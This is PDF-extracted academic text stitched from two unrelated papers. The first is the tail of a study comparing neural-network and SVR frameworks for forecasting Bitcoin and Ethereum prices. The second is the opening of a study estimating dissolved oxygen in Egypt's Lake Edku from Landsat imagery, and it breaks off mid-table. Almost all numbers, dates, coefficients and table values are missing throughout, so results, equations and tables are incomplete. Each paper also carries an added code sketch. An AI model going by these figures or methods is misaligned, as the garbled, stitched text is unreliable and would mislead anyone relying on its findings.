keras, are set equal to the default values. it is worth to underline that a classifi- cation model could also be considered, since low mape values do not neces- sarily mean that the model predicts the price rise and fall correctly. classifica- tion models will be taken into account in our future work, but they are out of scope of this first paper. in this work we trained all our frameworks for some days on a laptop with an intel(r) core(tm) i - u cpu @ . ghz . ghz, gb ram and graphic card intel hd . cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ contrary to ann, for bnn the k-fold cross-validation method identifies, as the best architecture, the one stage framework, in which the bnn follows the configuration described in section bayesian neural network, with two hidden layers and neurons. for this framework the average of the mape’s values across the k-folds, is equal to . (std. . ). once selected the best models we trained the model using the whole data set and compared the results. in order to evaluate the robustness of the selected models we run forty monte carlo runs, computing for each run the mape value at (t + n)th day ahead of time, with n = , n = , and n = . for ann, and specifically, for the svr+lstmnn the average and standard deviation of the mape’ values across monte carlo simulation are equal to . and . , to . and . , and to . and . 
, respectively for n = , n = , and n = day ahead of time. for bnn the average and standard deviation of the mape’ values across monte carlo simulation are equal to . and . , to . and . , and to . and . , respectively for n = , n = , and n = day ahead of time. of course all these values of mape increase while n goes from to and to , since the performance decreases while the day ahead of time increases (see table ) . table parameters and statistics of the best selected architecture for each proposed framework, in order to predict the bitcoin price, are described. statistics represent the average and standard deviation (in brackets), across the k-folds with k = , of the mape values. note that (r) stands for svr with a radial kernel function, (l) stands for svr with a linear kernel function, and (p) stands for svr with a poly- nomial kernel function. the bold entries highlight the framework with the lowest average of the mape’s values across the k-folds. lstmnn svr (r) + lstmnn svr (l) + lstmnn svr (p) + lstmnn # epochs # neurons # batchs γ . d avg (std) . ( . ) . ( . ) . ( . ) . ( . ) ffnn svr (r) + ffnn svr (l) + ffnn svr (p) + ffnn # epochs # neurons # batchs γ . d avg (std) . ( . ) . ( . ) . ( . ) . ( . ) bnn svr (r) + bnn svr (l) + bnn svr (p) + bnn nhl # neurons γ . d avg (std) . ( . ) . ( . ) . ( . ) ( . ) note that the procedure for tuning the model hyperparameters using the k-fold cross-validation method was applied considering the btc price prediction at (t + n)th day ahead of time, with n = . it has to apply for each n ! = to select for each n the best architecture. cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ these results show that predicted bitcoin prices by the bnn with n = have a mape very similar to that found by mallqui & fernandes ( ), albeit the periods analyzed are different. in fact, our work considers time series that range from january st, to april st, ; mallqui & fernandes ( ) considered two different periods. they found a mape value equal to . for the first interval, ranging from august th, to july th, , and equal to . for the second interval ranging from april st, to april st, , very close to our mape value of . and . respectively obtained applying bnn and svr+lstm. our predicted btc prices are also very close to that finding in the work by mudassir et al. ( ) by applying the so called svm and considering the interval from april , to december , , hence considering also the btc prices after april , as we did. the highest volatility of the btc prices was after april , as underlined in the work just quoted. mudassir et al. ( ) considered three data intervals: from april , to july , ; from april , to april , ; and the interval from april , to december , . for the last of the three intervals the authors found a mape value of . for ann, of . for lstmnn, . for svm, and of . for sann. lower mape values were found for the first two intervals. this is because the btc prices volatility is not much high, and btc prices are relatively stable, even if in the second interval btc prices are noticeably higher toward the end. similar analysis was performed also for another cryptocurrency, specifically for ethereum. obtained results are shown in tables and . 
results described in table highlight that the two stages frameworks for ann, composed of svr, using linear and polynomial kernel functions, perform better than the correspondent one stage frameworks and two stages framework composed of svr, using a radial kernel function; and the bnn’s performance is higher than all the others. table describes the average and standard deviation of the mape’s values across monte carlo simulations for the best selected architecture, svr+ffnn and bnn. best results are obtained for bnn as in the case of bitcoin even if the mape value is slightly higher for etherem, . ( . ) vs. . ( . ) for bitcoin. note that also in this case mape values increase while n goes from to . we conclude this section presenting the predicted bitcoin prices at (t + )th day ahead of time by the bnn in one of the monte carlo simulations performed. table describes the mean, the standard deviation, and the . and . quantiles of just ten predicted values, and gives an idea of how much the predicted values differ from the true values for table average and standard deviation (in brackets) for mape values across the performed mc runs obtained by training the selected best architectures using the whole data set to predict bitcoin price. svr (l) + lstmnn bnn n = . ( . ) . ( . ) n = . ( . ) . ( . ) n = . ( . ) . ( . ) cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ n = . the first column in the table describes the actual value of the bitcoin price. specifically these prices refer to the bitcoin price from may th, to may st, . they are the first ten values of the bitcoin price into the testing dataset. the second column describes the average values predicted by the bnn for each actual value reported in the first column. remember that the output of the bnn are assumed to be sampled from a distribution, consequently to give an idea of the results’s goodness in the table we illustrate for each predicted price also the standard deviation, and the . and . quantiles. for this monte carlo simulation the mape value is equal to . . table parameters and statistics of the best selected architecture for each proposed framework, in order to predict the ethereum price, are described. statistics represent the average and standard deviation (in brackets), across the k-folds with k = , of the mape values. note that (r) stands for svr with a radial kernel function, (l) stands for svr with a linear kernel function, and (p) stands for svr with a polynomial kernel function. the bold entries highlight the framework with the lowest average of the mape’s values across the k-folds. lstmnn svr (r) + lstmnn svr (l) + lstmnn svr (p) + lstmnn # epochs # neurons # batchs γ . d avg (std) . ( . ) . ( . ) . ( . ) . ( . ) ffnn svr (r) + ffnn svr (l) + ffnn svr (p) + ffnn # epochs # neurons # batchs γ . d avg (std) . ( . ) . ( . ) . ( . ) . ( . ) bnn svr (r) + bnn svr (l) + bnn svr (p) + bnn nhl # neurons γ . d avg (std) . ( . ) . ( . ) . ( . ) . ( . ) table average and standard deviation (in brackets) for mape values across the performed mc runs obtained by training the selected best architectures using the whole data set to predict ethereum price. svr (p) + lstmnn bnn n = . ( . ) . ( . ) n = . ( . ) . ( . ) n = . ( . ) . ( . ) cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ conclusions in this article, several ml frameworks to forecast bitcoin and ethereum prices are comparatively tested. they are divided into one stage frameworks and two stages frameworks. the formers are frameworks based on just one ml technique. the latters are based on two ml techniques working in cascade. we used three one stage frameworks, and three two stages ones. the first three use different nn models. specifically, we considered bnn, ffnn and lstmnn. the second ones use an ffnn, an lstmnn, and an bnn, each of them in cascade to an svr. the goal of this work was to analyze the performance of bnn in the forecasting the bitcoin and ethereum daily closing prices, and to compare it with those obtained using ffnn and lstmnn, considering both the typologies of frameworks. all frameworks attempt to predict the prices starting from five technical indicators, sma, ema, mom, macd, and rsi. specifically, in the one stage frameworks starting from the value of these five technical indicators at tth day, we predicted the daily closing price at (t + n)th day, with n = , n = , and n = . in the two stages frameworks the first stage, formed by an svr, receives in input the five technical indicators at tth day and predicts the value of the five technical indicators at (t + n)th day; the second stage receives in input the estimate of five technical indicators at (t + n)th day and predicts the daily closing price at (t + n)th day. we tuned all the proposed framework applying the k-fold cross-validation method to % of the whole data set. we created several models training them at each k-fold, hence computing for each fold a mape’s value. then, for each model we computed the average of the mape’s values across the k-folds. the model with the lowest average results to be the best. it represents the model that has to be trained on all data. we selected the best model for the ann and the best model for bnn. the former corresponds to a two stages framework, and the latter corresponds to a one stage framework, both for bitcoin and ethereum price prediction. table statistics on ten samples of predicted bitcoin price expressed in us$ at (t +n)th day ahead of time, with n = , using bnn. note that these values refer to the first ten samples of the testing dataset. the corresponding actual values are shown in the first column. actual value mean std . quantile . quantile , . , . , . , . , . , . . , . , . , . , . . , . , . , . , . , . , . , . , . . , . , . , . , . . , . , . , . , . . , . , . , . , . . , . , . , . , . . , . , . , . , . . , . , . cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ results show that the predicted bitcoin prices by the bnn have a mape in accord with those reported in the works present in the literature. furthermore, the performance of some proposed two stages frameworks, svr+ffnn and svr+lstmnn, show a clear improvement with respect to those of the correspondent one stage frameworks, and the goodness of some two stages frameworks’ predictions is close to that obtained by the bnn. the goal of this work is to give useful insights to build efficient frameworks for trading. the proposed frameworks could be used to decide when and how much to invest, and also to build efficient bitcoin trading strategies in a market highly volatile, in which short term trading may give several opportunities to make profit when correct trading strategies are applied. 
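the data flow of the two stages frameworks summarized above can be made concrete with a short sketch. it is an illustration under our own assumptions, not the authors' code: sklearn's svr is single output, so the first stage is written here as one svr per technical indicator, and the second stage is trained on the observed indicators at day t + n while prediction chains the two stages together.

import numpy as np
from sklearn.svm import SVR

class TwoStageFramework:
    """stage 1: svrs mapping the indicators at day t to the indicators at day t+n;
    stage 2: any regressor (ffnn, lstmnn, ...) mapping the indicators at day t+n
    to the closing price at day t+n."""

    def __init__(self, second_stage, kernel="linear", n_indicators=5):
        self.first_stage = [SVR(kernel=kernel) for _ in range(n_indicators)]
        self.second_stage = second_stage

    def fit(self, indicators_t, indicators_tn, price_tn):
        # one svr per indicator, then the price regressor on the true indicators
        for j, svr in enumerate(self.first_stage):
            svr.fit(indicators_t, indicators_tn[:, j])
        self.second_stage.fit(indicators_tn, price_tn)
        return self

    def predict(self, indicators_t):
        # estimate the indicators at day t+n, then map them to the price at day t+n
        estimated = np.column_stack([svr.predict(indicators_t)
                                     for svr in self.first_stage])
        return self.second_stage.predict(estimated)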
the novelty of this work consists in the model selection, by applying the k-fold cross- validation method to % of the whole dataset, and in applying the monte carlo method during the training phase of the best selected architectures that takes the whole dataset into account, to predict cryptocurrency markets, specifically the bitcoin and the ethereum market. future work aims to perform a more exhaustive optimization of all the proposed frameworks in this work, and to analyze their response in the case in which more inputs are taken into account. in fact, it is reasonable thinking that a more exhaustive optimization of the proposed frameworks and more inputs to train the networks will allow to obtain even higher performance. additional information and declarations funding this research is supported by the research projects funded by the sardegna ricerche public body, por sardegna fesr / eu grants: “sardcoin - sardcoin: tecnologie blockchain a supporto del turismo in sardegna”; top-down cluster projects; “easywallet”; r&d grants for r&d projects; “crypto-trading”- r&d grants for r&d projects. there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: sardegna ricerche public body, por sardegna fesr: / . competing interests the authors declare that they have no competing interests. author contributions � luisanna cocco conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � roberto tonelli conceived and designed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. � michele marchesi conceived and designed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. data availability the following information was supplied regarding data availability: data files are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abraham d, higdon d, nelson j, ibarra j. . cryptocurrency price prediction using tweet volumes and sentiment analysis. smu data science review ( ): – . akcora c, dey ak, gel y, kantarcioglu m. . pakdd: forecasting bitcoin price with graph chainlets. pakdd. available at https://cakcora.github.io/blockchain/ .pdf. anguita d, ghelardoni l, ghio a, oneto l, ridella s. . the ’k’ in k-fold cross validation. in: european symposium on artificial neural networks, computational intelligence and machine learning, – april . bruges, – . brownlee j. a. how to convert a time series to a supervised learning problem in python. available at https://machinelearningmastery.com/convert-time-series-supervised-learning- problem-python/ (accessed november ). brownlee j. b. multistep time series forecasting with lstms in python. available at https://machinelearningmastery.com/multi-step-time-series-forecasting-long-short-term- memory-networks-python/ (accessed november ). brownlee j. c. what is the difference between test and validation datasets? 
available at https://machinelearningmastery.com/difference-test-validation-datasets/ (accessed november ). chen z, li c, sun w. . bitcoin price prediction using machine learning: an approach to sample dimension engineering. journal of computational and applied mathematics ( ): doi . /j.cam. . . chih-hung w, yu-feng m, chih-hung l. . a new forecasting framework for bitcoin price with lstm. in: ieee international conference on data mining workshops (icdmw). cocco l, tonelli r, marchesi m. . an agent-based artificial market model for studying the bitcoin trading. ieee access ( ): doi . /access. . greaves as, au b. . using the bitcoin transaction graph to predict the price of bitcoin. available at https://pdfs.semanticscholar.org/a ce/ c ffa da add .pdf. huang jz, huang w, ni j. . predicting bitcoin returns using high-dimensional technical indicators. journal of finance and data science ( ): – doi . /j.jfds. . . . indera ni, yassin i, zabidi a, rizman zi. . non linear autoregressive with exogenous input (narx) bitcoin price prediction model using pso-optimized parameters and moving average technical indicators. journal of fundamental and applied sciences ( s): – doi . /jfas.v i s. . cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information https://cakcora.github.io/blockchain/ .pdf https://machinelearningmastery.com/convert-time-series-supervised-learning-problem-python/ https://machinelearningmastery.com/convert-time-series-supervised-learning-problem-python/ https://machinelearningmastery.com/multi-step-time-series-forecasting-long-short-term-memory-networks-python/ https://machinelearningmastery.com/multi-step-time-series-forecasting-long-short-term-memory-networks-python/ https://machinelearningmastery.com/difference-test-validation-datasets/ http://dx.doi.org/ . /j.cam. . http://dx.doi.org/ . /access. https://pdfs.semanticscholar.org/a ce/ c ffa da add .pdf http://dx.doi.org/ . /j.jfds. . . http://dx.doi.org/ . /jfas.v i s. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ jang h, lee j. . an empirical study on modeling and prediction of bitcoin prices with bayesian neural networks based on blockchain information. ieee access : – doi . /access. . . jang h, lee j, ko h, lee w. . predicting bitcoin prices by using rolling window lstm model. in: proceedings of kdd data science in fintech workshop (dsf). new york: acm, – . ji s, kim j, im h. . a comparative study of bitcoin price prediction using deep learning. mathematics ( ): – doi . /math . kingma dp, adam jb. . a method for stochastic optimization. in: rd international conference for learning representations iclr, san diego, ca. kirkpatrick cd, dahlquist jr. . technical analysis: the complete resource for financial market technicians. second edition. upper saddle river: financial times press. kuhn m, johnson k. . applied predictive modeling. new york: springer-verlag. lahmiri s, bekiros s. . cryptocurrency forecasting with deep learning chaotic neural networks. chaos, solitons & fractals (c): – doi . /j.chaos. . . . lamothe-fernández p, alaminos d, lamothe-lópez p, fernández-gámez m. . deep learning methods for modeling bitcoin price. mathematics ( ): . livieris i, pintelas e, stavroyiannis s, pintelas p. . ensemble deep learning models for forecasting cryptocurrency time-series. algorithms ( ): . mallqui da, fernandes ras. . 
predicting the direction, maximum, minimum and closing prices of daily bitcoin exchange rate using machine learning techniques. applied soft computing ( ): – doi . /j.asoc. . . .
mcnally s, roche j, caton s. . predicting the price of bitcoin using machine learning. in: th euromicro international conference on parallel, distributed, and network-based processing, – march . cambridge, united kingdom.
mudassir m, bennbaia s, unal d, hammoudeh m. . time-series forecasting of bitcoin prices using high-dimensional features: a machine learning approach. neural computing & applications – doi . /s - - - .
munim z, shakil m, alon i. . next-day bitcoin price forecast. journal of risk and financial management ( ): – .
pant dr, neupane p, poudel a, pokhrel ak, lama bk. . recurrent neural network based bitcoin price prediction by twitter sentiment analysis. in: ieee rd international conference on computing, communication and security (icccs), kathmandu, nepal.
patel j, shah s, thakkar p, kotecha k. . predicting stock market index using fusion of machine learning techniques. expert systems with applications ( ): – doi . /j.eswa. . . .
phaladisailoed t, numnonda t. . machine learning models comparison for bitcoin price prediction. in: th international conference on information technology and electrical engineering (icitee), – july . indonesia.
rodriguez jd, perez a, lozano ja. . sensitivity analysis of k-fold cross validation in prediction error estimation. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . .
roy s, nanjiba s, chakrabarty a. . bitcoin price forecasting using time series analysis. in: st international conference of computer and information technology (iccit), – december , united international university, bangladesh.
shintate t, pichl l. . trend prediction classification for high frequency bitcoin time series with deep learning. journal of risk and financial management ( ): .
uras n, marchesi l, marchesi m, tonelli r. . forecasting bitcoin closing price series using linear regression and neural networks models. peerj computer science ( ):e doi . /peerj-cs. .
velankar s, valecha s, maji s. . bitcoin price prediction using machine learning. in: international conference on advanced communications technology (icact), – february , chuncheon, south korea.
doi: . /ijanmc- -
international journal of advanced network, monitoring and controls volume , no. ,

assessment of a non-optical water quality property using space-based imagery in egyptian coastal lake

hala o. abayazid and ahmed el-adawy
coastal research institute, national water research center, ministry of water resources and irrigation
hala osman moukhtar abayazid: e-mail: halazid@yahoo.com, address: al-essawy street, sidi beshr, alexandria, egypt

abstract—progressive anthropogenic intrusion and increasing water demand necessitate frequent water quality monitoring for sustainability management. unlike laborious, time consuming field-based measurements, remote sensing-based water quality retrieval proved promising to overcome difficulties with temporal and spatial coverage. however, remotely estimated water quality parameters are mostly related to visibility characteristic and optically active property of water. this study presents results of an investigated approach to derive an oxygen-related water quality parameter, namely dissolved oxygen (do), in a shallow inland water body from satellite imagery. the approach deduces do levels based on interrelated optical properties that dictate oxygen consumption and release in waters. comparative analysis of multiple regression algorithms was carried out, using various combinations of parameters; namely, turbidity, total suspended solids (tss), chlorophyll-a, and temperature. to cover the wide range of conditions that is experienced by edku coastal lake, ground truth measurements covering the four seasons were used with corresponding satellite imageries. while results show successful statistically significant correlation in certain combinations considered, yet optimal results were concluded with turbidity and natural logarithm of temperature. the algorithm model was developed with summer and fall data (r . ), then validated with winter and spring data (r . ). retrieved do concentrations highlighted the variability in pollution degree and zonation nature within that coastal lake, as related to boundary interactions and irregularity in flow dynamics within. the approach presented in this study encourages expanded applications with space-based earth observation products for exploring non-detectable water quality parameters that are interlinked with optically active properties in water.

keywords-remote sensing; algorithm model; coastal lake; dissolved oxygen

i. introduction

increasing demands and progressive development process have compromised sustainability potential of the coastal lakes in egypt.
the quality of water resources dictates beneficial uses offered as well as functionality of the aquatic ecosystem, especially with the alarming pollution level associated with the anthropogenic activities. thus, continuous monitoring and frequent update of water resources status are required for sound management planning and corrective measure scenarios. however, such tasks require comprehensive data collection with adequate temporal and spatial coverage. remote sensing is an advancing field that has the potential in reducing field work difficulties, and increasingly considered an essential planning tool. a. remote sensing-based water quality retrieval several studies in literature have addressed retrieval of water quality parameters using remote sensing techniques. significant correlations have been found between specific water quality parameters and reflectance measured with satellite sensors. these parameters cause change to the spectral properties of reflected light and, hence, are remotely detectable (gholizadeh et al., ). recent research by swain and sahoo ( ) argued that certain conservative pollutants can be distinctively detected with different reflectance received in the electromagnetic spectrum because no biochemical reactions or ionic exchange are experienced. retrieving properties such as water clarity; turbidity, and total suspended solids (tss) concentrations mailto:halazid@yahoo.com international journal of advanced network, monitoring and controls volume , no. , using earth observation imageries have been tackled in applied research studies worldwide (kloiber et al. ; zhang, ; bilge et al., ; he et al., ; sravanthi et al., ; dona et al., ; dorji and fearns ; abayazid and el-gamal ). in , he et al. presented water quality retrieval models with proven successful results for optical nitrogenous and phosphorous components. other parameters such as chlorophyll-a (chl-a) and colored dissolved organic matter (cdom)) have also been covered in various studies (i.e. brezonik et al., ; thiemann and kaufmann, ; li et al., ; dona et al., ). remotely deriving weak and/or non- optical water quality characteristics, that have no directly-detectable reflection, is challenging. consequently, early studies are mostly focused on water physical and biogeochemical components that are considered optically active (giardino et al., ). however, limitation to water quality characteristics that are related to inherent optical property (iop) narrows down the parameters that can be assessed by remote sensing techniques. the dissolved oxygen (do) concentration is considered a crucial indicator of water system healthiness, and governs recovery capability (unesco, ). yet, being a non-optically active parameter, do levels cannot be directly retrieved using remote sensing technique. this research study aims to present an approach to detect dissolved oxygen concentrations in an inland shallow coastal lake, using space-based imageries. based on grounds of early do modeling theories, as well as regional conditions, the study investigates the potentiality of deducing do levels from optically detectable water quality parameters that affect, and be affected by, oxygen presences in water. b. study area with growing population and development activities, the nile delta of egypt experience challenging conditions. lake edku is located within the active northwestern coastal zone of the delta, between longitudes ° ' & ° 'e and latitudes ° ' & ° 'n (fig. ). 
the lake is characterized by systematically shrinking free open water, an altered ecosystem and a deteriorating water quality state (abayazid, ). edku lake serves an active agri-urban basin and is bordered by dense aquaculture practices. accordingly, the lake receives wastewaters with different pollution degrees from fish farming therapeutic drugs and nutrient flux from the agricultural drainage network (e.g. edku, el-boussili, khairy and bearsik drains), in addition to effluents from municipal wastewater treatment plants (wwtps) and industrial facilities (siam and ghobrial, ). the lake is connected to the mediterranean sea by a single opening, "boghaz al-maadia", which allows temporal tidal inflows and localized saline water interaction. discharges with heavy nutrient levels, as well as the decreased salinity inputs, have encouraged excessive unwanted aquatic vegetation. that, in turn, has disturbed natural circulation, flow dynamics and sediment transport, and hence self-purification within the lake (hossen and negm, ).

ii. materials and methods
this section addresses the basis of do modeling that dictated the selection of the parameters included in this study application. also, the ground truth data and corresponding satellite imageries considered are presented, followed by the approach adopted for algorithm development.

a. theory: grounds for do modeling
modeling of dissolved oxygen in water bodies was initiated by streeter and phelps through an application in the ohio river of the united states of america (chapra, ). simulation studies were based on the fact that the rate at which do fluctuates in waters reflects the rate of oxygen demand and release. their modified model set the foundation of do sinks and sources through the inclusion of factors proved to affect dissolved oxygen depletion and recovery in a water body. beside the initially considered coefficients that represent reaeration as well as settling/decay processes, the model extension added representative components of the role of aquatic flora in oxygen production and exhaustion through photosynthetic activity. furthermore, sediment consumption of do was added as an effective factor to be employed in the modified model for do prediction. equations ( ) and ( ) state the early model and the modified version, respectively; more details can be found in the textbook of chapra ( ).

figure . edku lake

d_t = d_o exp(-k_a t) + [ k_c l_o / (k_a - k_c) ] [ exp(-k_c t) - exp(-k_a t) ]   ( )

where d_t is the predicted dissolved oxygen deficit concentration, t is the travel time, l is the bod level at the point of interest, l_o is the ultimate bod level, k_a is the reaeration rate, k_d is the decomposition rate, k_s is the settling removal rate, k_c is the cbod decay coefficient, and d_o is the initial value of the oxygen deficit.

d_t = d_o exp(-k_a t) + [ k_c l_o / (k_a - k_c) ] [ exp(-k_c t) - exp(-k_a t) ] + [ k_n n_o / (k_a - k_n) ] [ exp(-k_n t) - exp(-k_a t) ] + ( s_b / k_a ) [ 1 - exp(-k_a t) ] + [ (r - p) / k_a ] [ 1 - exp(-k_a t) ]   ( )

the modified model has added factors as follows: p, the photosynthetic oxygen production rate; r, the algal respiration rate; s_b, the sediment oxygen demand rate; n_o, the initial nitrogenous bod (nbod); and k_n, the nbod decay coefficient.

b. field measurements
ground truth data used were obtained from the published research study by okbah et al. ( ).
the authors presented data collected at ten sampling locations distributed throughout edku lake. the spatial distribution of the field measurement locations reflects variability in the lake water quality with regard to boundary interaction as well as flow movements within the lake (fig. ). further, sampling campaigns were carried out during four seasons, spring, summer, fall and winter of year , which reflected the variable conditions that the coastal lake experiences. statistics of the field measurements show that in summer time do levels reach the lowest concentrations, ranging from . to . mg/l, and experience wide variability within the lake, with a standard deviation of among the ten investigated locations. meanwhile, the highest do levels occur in winter, ranging from . to . mg/l, with a standard deviation of . . the lake water do ranges from . to . mg/l in spring, whereas the fall season has slightly lower concentrations, ranging from . to . mg/l. maximum measured do concentrations were mostly found in zones "c" and "d", as illustrated in figure ( ). on the other hand, minimum levels occur at locations within the eastern zone "a", where most of the direct wastewater discharges reach the lake water, especially in the summer season.

figure . field measurement locations in lake edku zones a, b, c, and d
figure . observed do data (mg/l) during four seasons in lake edku zones

c. remote sensing data
in , ganoe and deyoung presented a theoretical basis for do retrieval with the use of air-borne raman spectroscopy instead of ship-based technology that customarily required direct contact with the waterbody. the authors argued the advantages of the air-based technique in measuring do when compared with time-consuming field trips, as well as the limitation of the latter in detecting variability under changing water conditions. the research concluded promising success of remote sensing retrieval of the temporal and spatial dynamics of dissolved gas distributions in coastal ecosystems. yet aerial arrangements are costly and not always readily available, while space-borne sensors can offer more frequent revisits and reasonable spatial coverage with advancing spectral resolution. the imageries used in this study are the freely available landsat operational land imager (oli) scenes from the united states geological survey (usgs) earth explorer website. the landsat (oli/tirs) is the most recent satellite launched under the landsat program, with a swath width of km and a days' revisit interval. since the in situ do data were collected during spring, summer, fall and winter of year , the images used in this study were acquired on the nearest corresponding overpass dates to match the sampling data timing, table ( ). table ( ) states the spectral range considered in this study, covering visible and near-infrared as well as thermal infrared bands. the necessary image processing and result analysis were carried out in a geographic information system (gis) environment.

table i. used landsat (oli) scenes and dates of acquisition
scene id (path/row): "lc lgn ", date acquired: -mar-
scene id (path/row): "lc lgn ", date acquired: -may-
scene id (path/row): "lc lgn ", date acquired: -aug-
scene id (path/row): "lc lgn ", date acquired: -dec-

table ii. landsat (oli) spectral bands considered in this study
band (visible): . - . μm
band (visible): . - . μm
band (visible): . - . μm
band (near-infrared): . - . μm
thermal infrared sensor (tirs), thermal infrared (band ): . - . μm
thermal infrared sensor (tirs), thermal infrared (band ): . - . μm
d. algorithm development
satellite imageries were processed for carrying out the multiple regression technique and reaching the best algorithm model for do retrieval in lake edku. the analysis was performed with the spatially distributed field measurements of dissolved oxygen as related to the spectral reflectance values derived from landsat images at corresponding dates in year . the available field data were divided into two groups for building the algorithm models. performance was then tested with the reserved second group of data for the validation process. based on the previously mentioned grounds of streeter and phelps do modeling, as well as the regional conditions defining water quality in coastal lakes of egypt, the trophic and sediment-related properties were considered key factors in selection. primarily, the parameters included for developing do derivative algorithms were turbidity, total suspended sediments (tss), and chlorophyll-a. also, temperature was added in the do retrieval process as an important driver affecting oxygen level in water, especially with the thermal anthropogenic releases and flow dynamic irregularity within lake edku. customarily, do concentration in water is inversely related to temperature. therefore, zonation of the thermal property is expected to have a direct reflection on the retrieved do distribution. in the process, alternate combinations of the considered parameters were investigated for optimal model results. turbidity and tss levels were deduced using findings of the recent research study of abayazid and el-gamal ( ). the authors concluded regional algorithm models for remotely sensed turbidity and tss in the nile delta coastal zone, in terms of landsat 's reflectance from spectral bands band ref, band ref and band ref, as presented in equations ( ) and ( ), respectively.

ln turbidity = - . + [ . band ref] + [ . ln (band ref / band ref)]   ( )
ln tss = . [ . + . band ref] .   ( )

while literature applications showed various retrieval algorithms for chlorophyll-a (e.g. dona et al.; akbar et al.; brivio et al.), the best agreeable results for quantifying chlorophyll-a in lake edku were found with the ratio between reflectance from spectral bands and of landsat (eq. ).

chlorophyll-a = band ref / band ref   ( )

thermal spectral data were converted to temperature "t" using the conversion formula presented in equation ( ) (usgs, ),

t = k / ln( k / lλ + 1 )   ( )

where lλ is the spectral radiance, and k and k are the thermal conversion constants found in the landsat imagery metadata files. surface water temperature levels are calculated using averaged values of thermal infrared bands ( ) and ( ). sensitivity analysis was performed to select the best combination of the considered parameters, under the different seasonal conditions experienced in the lake. accordingly, the optimal do retrieval algorithm model with the best fitting predictions, as well as the least data requirement and calculation effort, was selected for result demonstration.
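to make the band arithmetic above concrete, a minimal python/numpy sketch is given below. the regression coefficients and the specific band combinations are placeholders (the published band numbers and coefficient values are elided in the equations above), and k1/k2 stand for the thermal constants read from the landsat oli/tirs scene metadata, so this outlines the workflow rather than reproducing the authors' exact implementation:

import numpy as np

def derive_do_inputs(band_vis_a, band_vis_b, band_nir, band_tir_1, band_tir_2,
                     k1, k2, turb_coef=(0.0, 1.0, 1.0)):
    """derive the optical inputs of the do model from landsat oli/tirs arrays.

    band_vis_a, band_vis_b, band_nir : reflectance arrays (placeholder band choice)
    band_tir_1, band_tir_2           : thermal spectral radiance arrays (l_lambda)
    k1, k2                           : thermal constants from the scene metadata
    turb_coef                        : placeholder regression coefficients (c0, c1, c2);
                                       the published values are not reproduced here
    """
    c0, c1, c2 = turb_coef

    # regional turbidity model of the form ln(turb) = c0 + c1*band + c2*ln(band ratio)
    turbidity = np.exp(c0 + c1 * band_nir + c2 * np.log(band_vis_a / band_vis_b))

    # chlorophyll-a proxy taken as a simple ratio of two visible bands
    chlorophyll_a = band_vis_a / band_vis_b

    # brightness temperature from each thermal band (usgs conversion), then averaged
    t1 = k2 / np.log(k1 / band_tir_1 + 1.0)
    t2 = k2 / np.log(k1 / band_tir_2 + 1.0)
    temperature = 0.5 * (t1 + t2)

    return turbidity, chlorophyll_a, temperature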
iii. results
many factors control the do concentration within a waterbody, both sources and sinks (e.g. consumption by flora and aerobic organisms, oxidation of carbonaceous and nitrogenous material, decomposition of organic material, photosynthetic activity, degrading inorganic chemicals, re-aeration possibility, as well as temperature and dynamics in flow). drainage water inflowing into lake edku from the interconnected stream networks reflects the expanding urban activities and industrial facilities, beside the intensive agricultural processes. in addition, the aquacultural practices add an extra polluting source.

a. remotely sensed input parameters
the four parameters initially considered as inputs for do modeling were spatially derived for the spring, summer, fall and winter seasons of year , with the corresponding landsat imageries. example illustrations are found in figures , , and for temperature, turbidity, tss and chlorophyll-a levels within lake edku, respectively.

figure . spatial distribution of derived temperature (ºc) within lake edku in spring
figure . spatial distribution of derived turbidity (ntu) within lake edku in spring
figure . spatial distribution of derived tss (mg/l) within lake edku in spring
figure . spatial distribution of derived chlorophyll-a (mg/m ) within lake edku in spring

b. sensitivity analysis
for developing the satellite-based dissolved oxygen retrieval model, the analysis was carried out with various combinations of input parameters versus do field measurements. the selected ground truth data are distributed throughout the lake zones. furthermore, the data cover the four seasons so that a wide range of water quality levels experienced in the lake is considered in the developed model. table ( ) presents the model predictive capacity and goodness of fit while considering selective inputs as well as seasonal variations of do presence in the lake waters. the sensitivity analysis showed that tss and turbidity have a similar effect in detecting oxygen consumption in the waterbody under consideration. it was also found that the least influential factor is chlorophyll-a; only a minor change, with least effect on the predictive capacity of the developed algorithm, occurs when adding chlorophyll-a to the input parameters.

table iii. sensitivity analysis for optimal do retrieval algorithm model (seasons; input parameters; regression coefficient r )
spring & fall & winter; turb, tss, chl, ln-temp; .
summer & fall & winter; turb, tss, chl, ln-temp; .
spring & summer & fall; turb, tss, chl, ln-temp; .
summer & fall; turb, tss, chl, ln-temp; .
spring & fall; turb, tss, chl, ln-temp; .
spring & winter; turb, tss, chl, ln-temp; .
spring & summer & fall; turb, tss, ln-temp; .
summer & fall & winter; turb, tss, ln-temp; .
spring & fall & winter; turb, tss, ln-temp; .
spring & fall; turb, tss, chl; .
spring & fall; tss, chl, ln-temp; .
spring & winter; tss, chl, ln-temp; .
summer & fall; turb, tss, ln-temp; .
summer & fall; turb, chl, ln-temp; .
summer & fall; tss, ln-temp; .
summer & fall; turb, ln-temp; .

